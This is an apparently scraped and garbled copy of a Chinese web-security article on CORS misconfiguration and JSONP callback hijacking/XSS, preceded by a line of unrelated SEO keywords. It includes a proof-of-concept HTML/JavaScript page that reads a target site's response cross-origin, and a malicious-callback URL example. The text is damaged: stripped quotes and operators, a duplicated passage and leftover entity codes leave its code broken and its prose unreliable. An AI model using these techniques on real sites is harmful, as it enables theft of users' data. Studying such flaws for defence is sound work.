流媒体视频网站开发,游戏源代码交易平台,咨询网络服务商,作文网推荐CORS跨域资源共享
Cors漏洞详解 - FreeBuf网络安全行业门户
响应标头中 当Access-Control-Allow-Origin字段为*时#xff0c;就代表任意域都可以访问#xff0c;就导致了Cors漏洞的产生
构造poc
!DOCTYPE
html
script typetext/javascript就代表任意域都可以访问就导致了Cors漏洞的产生
构造poc
!DOCTYPE
html
script typetext/javascript
function loadXMLDoc()
{var xhr new XMLHttpRequest();xhr.onreadystatechangefunction(){if(xhr.readyState 4 xhr.status 200) //if receive xhr response{var datasxhr.responseText;alert(datas);}}//request vuln pagexhr.open(GET,http://www.target.com,true) //网页地址xhr.send();
}
loadXMLDoc();
/script
/html
JSONP回调
信息泄露
burp jsonp_hunter 抓取回调
jsonpxss
条件1返回content-type为text/html 条件2get或post中的callback参数可控
get 生成url post 生成csrf页面
如有一个API端口为http://Evi1s7.com/api 构造一个恶意URL https://Evi1s7.com/api?callbackattackerFunction 在attackerFunction中注入恶意脚本
